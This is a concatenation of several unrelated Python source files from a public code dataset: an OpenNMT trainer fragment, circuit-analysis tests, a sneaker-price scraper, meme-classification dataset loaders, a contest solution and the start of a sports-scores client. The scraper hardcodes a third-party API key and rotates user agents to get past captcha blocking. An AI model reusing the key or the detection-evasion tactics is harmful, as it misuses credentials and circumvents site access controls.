train_shards.append(shard_base)\n train_iter = build_dataset_iter_multiple(train_shards, fields, opt)\n else:\n if opt.data_ids[0] is not None:\n shard_base = \"train_\" + opt.data_ids[0]\n else:\n shard_base = \"train\"\n train_iter = build_dataset_iter(shard_base, fields, opt)\n\n if opt.gpu != -1:\n logger.info('Starting training on GPU: %s' % opt.gpu)\n else:\n logger.info('Starting training on CPU, could be very slow')\n\n train_steps = 0\n\n trainer.train(\n train_iter,\n train_steps)\n\n if trainer.report_manager.tensorboard_writer is not None:\n trainer.report_manager.tensorboard_writer.close()\n\n\ndef build_trainer(opt, device_id, model, fields, steper, model_saver=None):\n \"\"\"\n Simplify `Trainer` creation based on user `opt`s*\n\n Args:\n opt (:obj:`Namespace`): user options (usually from argument parsing)\n model (:obj:`onmt.models.NMTModel`): the model to train\n fields (dict): dict of fields\n steper (:obj:`onmt.utils.steperizer`): steperizer used during training\n data_type (str): string describing the type of data\n e.g. \"text\", \"img\", \"audio\"\n model_saver(:obj:`onmt.models.ModelSaverBase`): the utility object\n used to save the model\n \"\"\"\n\n tgt_field = dict(fields)[\"tgt\"].base_field\n train_loss = onmt.utils.loss.build_loss_compute(model, tgt_field, opt, do_backward=False)\n\n if device_id >= 0:\n n_gpu = 1\n gpu_rank = device_id\n else:\n gpu_rank = 0\n n_gpu = 0\n\n\n report_manager = onmt.utils.build_report_manager(opt, gpu_rank)\n trainer = Trainer(model, train_loss, steper,\n n_gpu=n_gpu, gpu_rank=gpu_rank, report_manager=report_manager,\n with_align=True if opt.lambda_align > 0 else False)\n return trainer\n\n\nclass Steper(object):\n def __init__(self):\n self.analysis_step = 0\n self._fp16 = None\n\n def step(self, step=1):\n self.analysis_step += step\n\n\nclass Trainer(object):\n\n def __init__(self, model, train_loss, steper,\n trunc_size=0, shard_size=32,\n norm_method=\"sents\",\n n_gpu=1, gpu_rank=1,\n report_manager=None, with_align=False, model_saver=None,\n average_decay=0, average_every=1, model_dtype='fp32'):\n # Basic attributes.\n self.model = model\n self.train_loss = train_loss\n self.steper = steper\n self.trunc_size = trunc_size\n self.shard_size = shard_size\n self.norm_method = norm_method\n self.n_gpu = n_gpu\n self.gpu_rank = gpu_rank\n self.report_manager = report_manager\n self.with_align = with_align\n self.model_saver = model_saver\n self.average_decay = average_decay\n self.moving_average = None\n self.average_every = average_every\n self.model_dtype = model_dtype\n\n self.model.train()\n\n def _accum_batches(self, iterator):\n batches = []\n normalization = 0\n for batch in iterator:\n batches.append(batch)\n if self.norm_method == \"tokens\":\n num_tokens = batch.tgt[1:, :, 0].ne(\n self.train_loss.padding_idx).sum()\n normalization += num_tokens.item()\n else:\n normalization += batch.batch_size\n yield batches, normalization\n batches = []\n normalization = 0\n if batches:\n yield batches, normalization\n\n def _update_average(self, step):\n if self.moving_average is None:\n copy_params = [params.detach().float()\n for params in self.model.parameters()]\n self.moving_average = copy_params\n else:\n average_decay = max(self.average_decay,\n 1 - (step + 1) / (step + 10))\n for (i, avg), cpt in zip(enumerate(self.moving_average),\n self.model.parameters()):\n self.moving_average[i] = \\\n (1 - average_decay) * avg + \\\n cpt.detach().float() * average_decay\n\n def train(self,\n train_iter,\n train_steps):\n\n total_stats = onmt.utils.Statistics()\n report_stats = onmt.utils.Statistics()\n self._start_report_manager(start_time=total_stats.start_time)\n\n for i, (batches, normalization) in enumerate(\n self._accum_batches(train_iter)):\n self.steper.step(batches[0].tgt.size(1))\n step = self.steper.analysis_step\n\n if self.n_gpu > 1:\n normalization = sum(onmt.utils.distributed\n .all_gather_list\n (normalization))\n\n self._gradient_accumulation(\n batches, normalization, total_stats,\n report_stats)\n\n if self.average_decay > 0 and i % self.average_every == 0:\n self._update_average(step)\n\n report_stats = self._maybe_report_training(\n step, train_steps,\n report_stats)\n\n if 0 < train_steps <= step:\n break\n\n return total_stats\n\n def _gradient_accumulation(self, true_batches, normalization, total_stats,\n report_stats):\n\n for k, batch in enumerate(true_batches):\n target_size = batch.tgt.size(0)\n # Truncated BPTT: reminder not compatible with accum > 1\n if self.trunc_size:\n trunc_size = self.trunc_size\n else:\n trunc_size = target_size\n\n src, src_lengths = batch.src if isinstance(batch.src, tuple) \\\n else (batch.src, None)\n if src_lengths is not None:\n report_stats.n_src_words += src_lengths.sum().item()\n\n tgt_outer = batch.tgt\n\n bptt = False\n for j in range(0, target_size - 1, trunc_size):\n # 1. Create truncated target.\n tgt = tgt_outer[j: j + trunc_size]\n\n outputs, attns, new_cost = self.model(src, tgt, src_lengths, bptt=bptt,\n with_align=self.with_align)\n bptt = True\n\n # 3. Compute loss.\n loss, batch_stats = self.train_loss(\n batch,\n outputs,\n attns,\n normalization=normalization,\n shard_size=self.shard_size,\n trunc_start=j,\n trunc_size=trunc_size,\n new_cost=new_cost)\n\n total_stats.update(batch_stats)\n report_stats.update(batch_stats)\n\n # If truncated, don't backprop fully.\n # TO CHECK\n # if dec_state is not None:\n # dec_state.detach()\n if self.model.decoder.state is not None:\n self.model.decoder.detach_state()\n\n def _start_report_manager(self, start_time=None):\n \"\"\"\n Simple function to start report manager (if any)\n \"\"\"\n if self.report_manager is not None:\n if start_time is None:\n self.report_manager.start()\n else:\n self.report_manager.start_time = start_time\n\n def _maybe_gather_stats(self, stat):\n \"\"\"\n Gather statistics in multi-processes cases\n\n Args:\n stat(:obj:onmt.utils.Statistics): a Statistics object to gather\n or None (it returns None in this case)\n\n Returns:\n stat: the updated (or unchanged) stat object\n \"\"\"\n if stat is not None and self.n_gpu > 1:\n return onmt.utils.Statistics.all_gather_stats(stat)\n return stat\n\n def _maybe_report_training(self, step, num_steps,\n report_stats):\n \"\"\"\n Simple function to report training stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_training` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_training(\n step, num_steps, 0, report_stats,\n multigpu=self.n_gpu > 1)\n\n def _report_step(self, step, train_stats=None,\n valid_stats=None):\n \"\"\"\n Simple function to report stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_step` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_step(0,\n step, train_stats=train_stats,\n valid_stats=valid_stats)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"he1ght/Concept_Equalization_with_Transformer","sub_path":"irr_nmt/onmt/bin/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73373185011","text":"\"\"\"symbols and Matric are imported from sympy library.\n\nos and sys are used to access the program that is being tested and present\nin the cc_params directory.\n\"\"\"\nimport os\nimport sys\nfrom sympy import symbols\nfrom sympy.matrices import Matrix\nmodule_path = os.path.dirname(os.path.pardir + os.path.sep)\nmodule_path = os.path.join(module_path, \"cc_params\")\nsys.path.insert(0, os.path.abspath(module_path))\nimport prog_tf as prog\n\n\ndef test_conductance_matrix():\n \"\"\"\n Test the formation of the conductance matrix for 4 given networks.\n\n Network1: Voltage source is not connected to the ground.\n Network2: A simple series RLC circuit\n Network3: A network with three elements connected between two nodes\n Network4: A complex network with 5 nodes (including the reference node)\n\n In order to test only specific functions we add attributes to the required\n test functions. The attribute used is will_run.\n\n To run this test use: nosetests -a will_run test_prog_tf.py\n \"\"\"\n s = symbols('s')\n o, d = [1, 0, 2, 1], [0, 2, 3, 3]\n e, v = [\"R1\", \"R2\", \"R3\", \"V1\"], [0.2, 0.2, 0.2, 5]\n test_output = Matrix([[5.0, 0.0, 0.0], [0, 10.0, -5.0], [0.0, -5.0, 5.0]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 3)\n o, d = [1, 2, 3, 1], [2, 3, 0, 0]\n e, v = [\"R1\", \"L1\", \"C1\", \"V1\"], [5.0, 10.0, 1e-6, 5.0]\n test_output = Matrix([[0.2, -0.2, 0.0], [-0.2, 0.2+0.1/s, -0.1/s],\n [0.0, -0.1/s, 0.1/s+1e-6*s]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 3)\n o, d = [1, 2, 3, 3, 3, 1], [2, 3, 0, 0, 0, 0]\n e = [\"R1\", \"C1\", \"C2\", \"L1\", \"R2\", \"V1\"]\n v = [10.0, 1e-6, 1e-6, 10.0, 5.0, 5.0]\n test_output = Matrix([[0.1, -0.1, 0], [-0.1, 0.1+1e-6*s, -1e-6*s],\n [0, -1e-6*s, 2*s*1e-6+0.1/s+0.2]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 3)\n o, d = [1, 2, 2, 3, 3, 4, 1], [2, 3, 0, 0, 4, 0, 0]\n e = [\"R1\", \"R2\", \"L1\", \"C1\", \"R3\", \"R4\", \"V1\"]\n v = [10.0, 10.0, 10.0, 1e-6, 10.0, 10.0, 5.0]\n test_output = Matrix([[0.1, -0.1, 0, 0], [-0.1, 0.2+0.1/s, -0.1, 0],\n [0, -0.1, 0.2+1e-6*s, -0.1], [0, 0, -0.1, 0.2]])\n assert(prog.set_cond_matrix(o, d, e, v)) == (test_output, 4)\n\n\ndef test_voltage_matrix():\n \"\"\"\n Test the formation of the volatge matrix required for nodal analysis.\n\n One test case is constructed with two volatge sources, where one source is\n between ground(reference node) and node 1 and another voltage source is\n between nodes 2 and 3\n\n Again attribute will_run is added to this function\n \"\"\"\n o, d = [1, 3, 1, 2, 3], [2, 2, 0, 0, 0]\n e = [\"R1\", \"V1\", \"V2\", \"R2\", \"R3\"]\n (v, v_t, dep) = prog.set_volt_matrix(o, d, e)\n test_output = (Matrix([[0, -1], [1, 0], [-1, 0]]),\n Matrix([[0, -1, 1], [1, 0, 0]]), Matrix([[0, 0], [0, 0]]))\n assert(v, v_t, dep) == test_output\n\n\ndef test_output_tf_calc():\n \"\"\"\n Test output of the function output_tf_calc of prog_tf.py.\n\n This creates the appropriate netlist for a simple series RLC circuit\n with the following parameters.\n V = 10V\n R = 10ohms\n L = 0.01H\n C = 10^-6F\n Nodal analysis of the above circuit is done by hand and provided as sol\n to the function output_tf_calc. Different output parameters such as\n current through inductor, voltage across inductor, voltage across\n capacitor, voltage across voltage source is tested.\n\n Atrribute will_run is also attached to this test function\n \"\"\"\n s = symbols('s')\n sol = {}\n impedance = (s**2*1e-8+s*1e-5+1.0)/(s*1e-6)\n iv1, v1, v2 = symbols('I_V1'), symbols('V_1'), symbols('V_2')\n v3 = symbols('V_3')\n sol[iv1] = 10.0/impedance\n sol[v1], sol[v2] = 10.0, 10.0-100.0/impedance\n sol[v3] = 10.0-100.0/impedance-(s*0.1)/impedance\n o, d = [1, 2, 3, 1], [2, 3, 0, 0]\n ident, val = [\"R1\", \"L1\", \"C1\", \"V1\"], [10, 0.01, 1e-6, 10]\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"L1\", \"I\")\n assert(test_out) == sol[iv1]\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"L1\", \"V\")\n assert(test_out) == sol[iv1]*0.01*s\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"C1\", \"V\")\n assert(test_out) == sol[v3]\n test_out = prog.output_tf_calc(sol, o, d, val, ident, \"V1\", \"V\")\n assert(test_out) == 10.0\n\n\ndef test_nodal_matrix():\n \"\"\"Test the formation of the 3 matrices required for solving nodal analysis.\n\n A simple series RLC circuit is taken for testing\n \"\"\"\n s, V_1, V_2 = symbols('s'), symbols('V_1'), symbols('V_2')\n V_3, I_V1 = symbols('V_3'), symbols('I_V1')\n m = Matrix([[0.2, -0.2, 0.0, -1.0], [-0.2, 0.2+0.1/s, -0.1/s, 0.0],\n [0.0, -0.1/s, 0.1/s+1e-6*s, 0.0], [1.0, 0.0, 0.0, 0.0]])\n unknowns = Matrix([[V_1], [V_2], [V_3], [I_V1]])\n rhs = Matrix([[0.0], [0.0], [0.0], [5.0]])\n c = Matrix([[0.2, -0.2, 0.0], [-0.2, 0.2+0.1/s, -0.1/s],\n [0.0, -0.1/s, 0.1/s+1e-6*s]])\n v, v_t = Matrix([[-1.0], [0.0], [0.0]]), Matrix([[1.0, 0.0, 0.0]])\n n_nodes, n_voltsrc, val = 3, 1, [5.0, 10.0, 1e-6, 5.0]\n ele_type, dep = [\"R1\", \"L1\", \"C1\", \"V1\"], Matrix([[0.0]])\n u, mat, r = prog.nodal_matrix(c, v, val, v_t, n_nodes, n_voltsrc,\n ele_type, dep)\n assert(mat, u, r) == (m, unknowns, rhs)\n\n\ndef test_check_netlist_error():\n \"\"\"Test the function check_netlist_error of prog_tf.py.\"\"\"\n origin, dest = [1, -2, 3, 1], [-2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Negative value of node.\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [-10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Non-positive value of R/L/C\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 0]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Zero value\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"You have not entered all identifiers.\")\n\n origin, dest = [1, 2, 3, 1], [1, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, -10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Same value of origin and destination node\")\n\n origin, dest = [1, 2, 3, 10], [2, 3, 10, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Your circuit is not connected.\")\n\n origin, dest = [1, 2, 3, 4], [2, 3, 4, 1]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"No reference node\")\n\n origin, dest = [1, 2, 3, 4], [2, 3, 1, 4]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, 10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (1, \"Multiple Errors\")\n\n origin, dest = [1, 2, 3, 1], [2, 3, 0, 0]\n ele_type, val = ['R1', 'L1', 'C1', 'V1'], [10, 0.01, 0.001, -10]\n e_flag, e_msg = prog.check_netlist_error(origin, dest, ele_type, val)\n assert(e_flag, e_msg) == (0, \"\")\n# Atrribute will_run is added to all the test functions\ntest_conductance_matrix.will_run = True\ntest_voltage_matrix.will_run = True\ntest_output_tf_calc.will_run = True\ntest_nodal_matrix.will_run = True\ntest_check_netlist_error.will_run = True\n","repo_name":"Soumya-dutta/SDES2016","sub_path":"tests/test_prog_tf.py","file_name":"test_prog_tf.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31460037376","text":"import json\nimport requests\nimport pprint\nfrom time import sleep\nimport random\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport proxyFinder\nimport csv\n\n\n#extracts all user-agents from the provided 'ua_file.txt' into a list then randomly selects a user-agent\ndef getUserAgent():\n randomUserAgent = \"\"\n listOfUserAgents = []\n userAgentFile = 'ua_file.txt'\n with open('ua_file.txt') as file:\n listOfUserAgents = [line.rstrip(\"\\n\") for line in file]\n return random.choice(listOfUserAgents)\n\n\nclass Sneaker:\n def __init__(self, name, query_id, retail_price, displayed_size, price, image_url):\n self.name = name\n self.query_id = query_id\n self.retail_price = retail_price\n self.displayed_size = displayed_size\n self.price = price\n self.image_url = image_url\n # self.sizeAndPrice = sizeAndPrice\n\n\n#function to get all sneakers from 'Shop All' page\ndef getAllSneakers():\n sneakersList = []\n #api call to retrieve sneaker details\n url = 'https://2fwotdvm2o-3.algolianet.com/1/indexes/*/queries'\n #size you want to look for:\n shoe_size = 8\n #data sent with POST request\n for page in range(0,5):\n form_data = {\n \"requests\": [{\n \"indexName\":\"product_variants_v2\",\n \"params\":\"\",\n \"highlightPreTag\" : \"\",\n \"highlightPostTag\": \"\",\n \"distinct\": \"true\",\n \"facetFilters\": [[\"presentation_size:\" + str(shoe_size)],[\"product_category:shoes\"]],\n \"maxValuesPerFacet\": 30,\n \"page\": page,\n \"facets\": [\"instant_ship_lowest_price_cents\",\"single_gender\",\"presentation_size\",\"shoe_condition\",\"product_category\",\"brand_name\",\"color\",\"silhouette\",\"designer\",\"upper_material\",\"midsole\",\"category\",\"release_date_name\"],\n \"tagFilters\":\"\"\n }]\n }\n query_params = {\n 'x-algolia-agent': 'Algolia for JavaScript (3.35.1); Browser (lite); JS Helper (3.2.2); react (16.13.1); react-instantsearch (6.8.2)',\n 'x-algolia-application-id': '2FWOTDVM2O',\n 'x-algolia-api-key': 'ac96de6fef0e02bb95d433d8d5c7038a'\n }\n response = requests.post(url, data=json.dumps(form_data), params=query_params).json()['results'][0]['hits']\n for sneaker in response:\n sneakersList.append(Sneaker(sneaker['name'], sneaker['slug'], sneaker['retail_price_cents']/100, sneaker['size'], sneaker['lowest_price_cents']/100, sneaker['original_picture_url'])) # setSneakerSizesAndPrices(sneaker['slug'])))\n # sleep(random.randrange(1,3))\n\n return sneakersList\n\n\ndef setSneakerSizesAndPrices(query_id):\n sizeAndPrice = {}\n url = 'https://www.goat.com/web-api/v1/product_variants'\n user_agent = getUserAgent()\n headers = {\n \"user-agent\": user_agent,\n \"accept\" : \"application/json\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\" : \"en-US,en;q=0.9\",\n \"referer\": 'https://www.google.com/'\n }\n\n query_params = {\n \"productTemplateId\": query_id\n }\n # proxy = proxyFinder.get_random_proxy()\n # proxies = {\n # \"http\": \"http://\" + proxy,\n # \"https\": \"https://\" + proxy\n # }\n\n # while True:\n for i in range(0, 10):\n try:\n headers.update({\"user-agent\": getUserAgent()})\n # proxies.update({\"http\": \"http://\" + proxyFinder.get_random_proxy(), \"https\": \"https://\" + proxyFinder.get_random_proxy()})\n # print(\"getting page with ip: \" + proxies['https'])\n response = requests.get(url, headers=headers, params=query_params, timeout=10)\n print(response.status_code)\n\n if(response.status_code >= 200 and response.status_code < 400):\n page = response.json()\n for i in range(0, len(page)):\n #check ONLY for new shoes with boxes in good condition\n if(page[i]['boxCondition'] == \"good_condition\" and page[i]['shoeCondition'] == \"new_no_defects\"):\n sizeAndPrice.update({page[i]['size']: page[i]['lowestPriceCents']['amount']/100})\n elif (response.json()['success'] == False): #catches if query_id invalid\n sizeAndPrice.update({\"message\": \"Invaid product id.\"})\n break\n else:\n raise PermissionError\n\n except (PermissionError):#request got blocked by captcha\n print(\"Unable to retrieve sneaker info...Retrying...\")\n # sleep(random.randrange(1,3)) #wait a while before retrying to avoid getting detected\n continue\n\n except requests.exceptions.Timeout as err:\n print(\"Request timed out...Retrying...\")\n continue\n\n else:\n break\n\n else: # if not sizeAndPrice:\n sizeAndPrice.update({\"Size_Timeout\": \"Price_Timeout\"})\n\n return sizeAndPrice\n\n\nif __name__ == \"__main__\":\n sneakers = getAllSneakers()\n sneakerData = {}\n nameList = []\n retailPriceList = []\n displayed_size = []\n price = []\n image_urls = []\n\n for sneaker in sneakers:\n nameList.append(sneaker.name)\n retailPriceList.append(sneaker.retail_price)\n displayed_size.append(sneaker.displayed_size)\n price.append(sneaker.price)\n image_urls.append(sneaker.image_url)\n # sizesAndPrices = sneaker.sizeAndPrice\n sneakerData.update({\"Name\": nameList, \"Retail Price\": retailPriceList, \"Display Size\": displayed_size, \"Price\":price})\n\n dataFrame = pd.DataFrame(sneakerData)\n dataFrame.to_csv(\"sneakers.csv\", index=False, header=True)\n print(dataFrame)\n\n # for sneaker in sneakers:\n # print(\"Name: \" + sneaker.name)\n # print(\"Retail Price: \" + str(sneaker.retail_price))\n # print(sneaker.sizeAndPrice)\n\n","repo_name":"Joseph1337/Sneaker_Scraper","sub_path":"goat_scraperV3.py","file_name":"goat_scraperV3.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33165760990","text":"import os\n\nimport pandas as pd\nimport torch\nfrom PIL import Image\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom torch.utils.data import Dataset\nfrom transformers import CLIPTokenizer, CLIPProcessor, AutoTokenizer\n\n\nclass HatefulMemesDataset(Dataset):\n def __init__(self, root_folder, image_folder, split='train', labels='original', image_size=224):\n super(HatefulMemesDataset, self).__init__()\n self.root_folder = root_folder\n self.image_folder = image_folder\n self.split = split\n self.labels = labels\n self.image_size = image_size\n self.info_file = os.path.join(root_folder, 'hateful_memes_expanded.csv')\n self.df = pd.read_csv(self.info_file)\n self.df = self.df[self.df['split']==self.split].reset_index(drop=True)\n float_cols = self.df.select_dtypes(float).columns\n self.df[float_cols] = self.df[float_cols].fillna(-1).astype('Int64')\n\n if split in ['test_seen', 'test_unseen']:\n self.fine_grained_labels = []\n elif self.labels == 'fine_grained':\n self.pc_columns = [col for col in self.df.columns if col.endswith('_pc') and not col.endswith('_gold_pc')]\n self.pc_columns.remove('gold_pc')\n self.attack_columns = [col for col in self.df.columns if col.endswith('_attack') and not col.endswith('_gold_attack')]\n self.attack_columns.remove('gold_attack')\n self.fine_grained_labels = self.pc_columns + self.attack_columns\n elif self.labels == 'fine_grained_gold':\n self.pc_columns = [col for col in self.df.columns if col.endswith('_gold_pc')]\n self.attack_columns = [col for col in self.df.columns if col.endswith('_gold_attack')]\n self.fine_grained_labels = self.pc_columns + self.attack_columns\n else:\n self.fine_grained_labels = []\n \n def __len__(self):\n return len(self.df)\n \n def __getitem__(self, idx):\n row = self.df.iloc[idx]\n item = {}\n image_fn = row['img'].split('/')[1]\n item['image'] = Image.open(f\"{self.image_folder}/{image_fn}\").convert('RGB').resize((self.image_size, self.image_size))\n item['text'] = row['text']\n item['label'] = row['label']\n item['idx_meme'] = row['id']\n item['idx_image'] = row['pseudo_img_idx']\n item['idx_text'] = row['pseudo_text_idx']\n item['caption'] = row['caption']\n\n if self.labels.startswith('fine_grained'):\n for label in self.fine_grained_labels:\n item[label] = row[label]\n\n return item\n\n\nclass TamilMemesDataset(Dataset):\n def __init__(self, root_folder, split='train', image_size=224):\n \"\"\"\n First, preprocess Tamil Troll Memes using `hateclipper/preprocessing/format_tamil_memes.ipynb`\n \"\"\"\n super(TamilMemesDataset, self).__init__()\n self.root_folder = root_folder\n self.split = split\n self.image_size = image_size\n self.info_file = os.path.join(root_folder, 'labels.csv')\n self.df = pd.read_csv(self.info_file)\n self.df = self.df[self.df['split']==self.split].reset_index(drop=True)\n self.fine_grained_labels = []\n \n def __len__(self):\n return len(self.df)\n \n def __getitem__(self, idx):\n row = self.df.iloc[idx]\n item = {}\n item['image'] = Image.open(f\"{self.root_folder}/{row['meme_path']}\").convert('RGB').resize((self.image_size, self.image_size))\n item['text'] = row['text']\n item['caption'] = row['text_transliterated'] # named as caption just to match the format of HatefulMemesDataset\n item['label'] = row['is_troll']\n\n return item\n\nclass PropMemesDataset(Dataset):\n def __init__(self, root_folder, split='train', image_size=224):\n super(PropMemesDataset, self).__init__()\n self.root_folder = root_folder\n self.split = split\n self.image_size = image_size\n self.info_file = os.path.join(root_folder, f'annotations/{self.split}.jsonl')\n self.df = pd.read_json(self.info_file, lines=True)\n self.fine_grained_labels = ['Black-and-white Fallacy/Dictatorship', 'Name calling/Labeling', 'Smears', 'Reductio ad hitlerum', 'Transfer', 'Appeal to fear/prejudice', \\\n 'Loaded Language', 'Slogans', 'Causal Oversimplification', 'Glittering generalities (Virtue)', 'Flag-waving', \"Misrepresentation of Someone's Position (Straw Man)\", \\\n 'Exaggeration/Minimisation', 'Repetition', 'Appeal to (Strong) Emotions', 'Doubt', 'Obfuscation, Intentional vagueness, Confusion', 'Whataboutism', 'Thought-terminating cliché', \\\n 'Presenting Irrelevant Data (Red Herring)', 'Appeal to authority', 'Bandwagon']\n mlb = MultiLabelBinarizer().fit([self.fine_grained_labels])\n self.df = self.df.join(pd.DataFrame(mlb.transform(self.df['labels']),\n columns=mlb.classes_,\n index=self.df.index))\n \n def __len__(self):\n return len(self.df)\n \n def __getitem__(self, idx):\n row = self.df.iloc[idx]\n item = {}\n item['image'] = Image.open(f\"{self.root_folder}/images/{row['image']}\").convert('RGB').resize((self.image_size, self.image_size))\n item['text'] = \" \".join(row['text'].replace(\"\\n\", \" \").strip().lower().split())\n item['labels'] = row[self.fine_grained_labels].values.tolist()\n for label in self.fine_grained_labels:\n item[label] = row[label]\n\n return item\n\nclass CustomCollator(object):\n\n def __init__(self, args, fine_grained_labels, multilingual_tokenizer_path='none'):\n self.args = args\n self.fine_grained_labels = fine_grained_labels\n self.image_processor = CLIPProcessor.from_pretrained(args.clip_pretrained_model)\n self.text_processor = CLIPTokenizer.from_pretrained(args.clip_pretrained_model)\n if multilingual_tokenizer_path != 'none':\n self.text_processor = AutoTokenizer.from_pretrained(multilingual_tokenizer_path)\n\n def __call__(self, batch):\n pixel_values = self.image_processor(images=[item['image'] for item in batch], return_tensors=\"pt\")['pixel_values']\n if self.args.caption_mode == 'replace_text':\n text_output = self.text_processor([item['caption'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n elif self.args.caption_mode == 'concat_with_text':\n text_output = self.text_processor([item['text'] + ' [SEP] ' + item['caption'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n else:\n text_output = self.text_processor([item['text'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n \n if self.args.dataset in ['original', 'masked', 'inpainted', 'tamil']:\n caption_output = self.text_processor([item['caption'] for item in batch], padding=True, return_tensors=\"pt\", truncation=True)\n labels = torch.LongTensor([item['label'] for item in batch])\n if self.args.dataset in ['original', 'masked', 'inpainted']:\n idx_memes = torch.LongTensor([item['idx_meme'] for item in batch])\n idx_images = torch.LongTensor([item['idx_image'] for item in batch])\n idx_texts = torch.LongTensor([item['idx_text'] for item in batch])\n\n batch_new = {}\n batch_new['pixel_values'] = pixel_values,\n batch_new['input_ids'] = text_output['input_ids']\n batch_new['attention_mask'] = text_output['attention_mask']\n if self.args.dataset in ['original', 'masked', 'inpainted', 'tamil']:\n batch_new['input_ids_caption'] = caption_output['input_ids']\n batch_new['attention_mask_caption'] = caption_output['attention_mask']\n batch_new['labels'] = labels\n if self.args.dataset in ['original', 'masked', 'inpainted']:\n batch_new['idx_memes'] = idx_memes\n batch_new['idx_images'] = idx_images\n batch_new['idx_texts'] = idx_texts\n\n if self.args.dataset in ['original', 'masked', 'inpainted', 'prop']:\n #if self.args.labels.startswith('fine_grained'):\n for label in self.fine_grained_labels:\n batch_new[label] = torch.LongTensor([item[label] for item in batch])\n\n if self.args.dataset == 'prop':\n batch_new['labels'] = torch.LongTensor([item['labels'] for item in batch])\n\n return batch_new\n\n\n\ndef load_dataset(args, split):\n\n if args.dataset == 'original':\n image_folder = 'data/hateful_memes/img'\n elif args.dataset == 'masked':\n image_folder = 'data/hateful_memes_masked/'\n elif args.dataset == 'inpainted':\n image_folder = 'data/hateful_memes_inpainted/'\n \n if args.dataset == 'tamil':\n dataset = TamilMemesDataset(root_folder='data/Tamil_troll_memes', split=split, image_size=args.image_size)\n elif args.dataset == 'prop':\n dataset = PropMemesDataset(root_folder='data/propaganda-techniques-in-memes/data/datasets/propaganda/defaults', split=split, image_size=args.image_size)\n else:\n dataset = HatefulMemesDataset(root_folder='data/hateful_memes', image_folder=image_folder, split=split, \n labels=args.labels, image_size=args.image_size)\n\n return dataset\n","repo_name":"gokulkarthik/hateclipper","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"72398048693","text":"def func(n):\n if 'AB' not in n or 'BA' not in n:\n print('NO')\n return\n a = n.index('AB')\n b = n.index('BA')\n for i in range(a+2,len(n)-1):\n if n[i]+n[i+1] == 'BA':\n print('YES')\n return\n for i in range(b+2,len(n)-1):\n if n[i]+n[i+1] == 'AB':\n print('YES')\n return\n print('NO')\nn = input()\nfunc(n)","repo_name":"bijeshofficial/coding_solutions","sub_path":"CodeForces/550A.Two_Solutions.py","file_name":"550A.Two_Solutions.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1138050710","text":"import json\nfrom typing import List, Optional\n\nfrom . import converter\nfrom .base import Base\nfrom .country import Country\nfrom .match import Match\n\n\nclass FlashscoreApi(Base):\n def __init__(self, locale: str = 'en'):\n self.locale = locale\n super().__init__(self.locale)\n \n def get_countries(self) -> List[Country]:\n response = self.make_request(self._main_url)\n flashscore_html = response.text \n raw_data_start = flashscore_html.find('rawData: ') + len('rawData: ')\n raw_data_end = raw_data_start + flashscore_html[raw_data_start:].find('\\n') - 1\n\n json_data = json.loads(flashscore_html[raw_data_start:raw_data_end])\n countries = []\n for data in json_data:\n for country in data['SCC']:\n countries.append(Country(\n id=country['MC'],\n 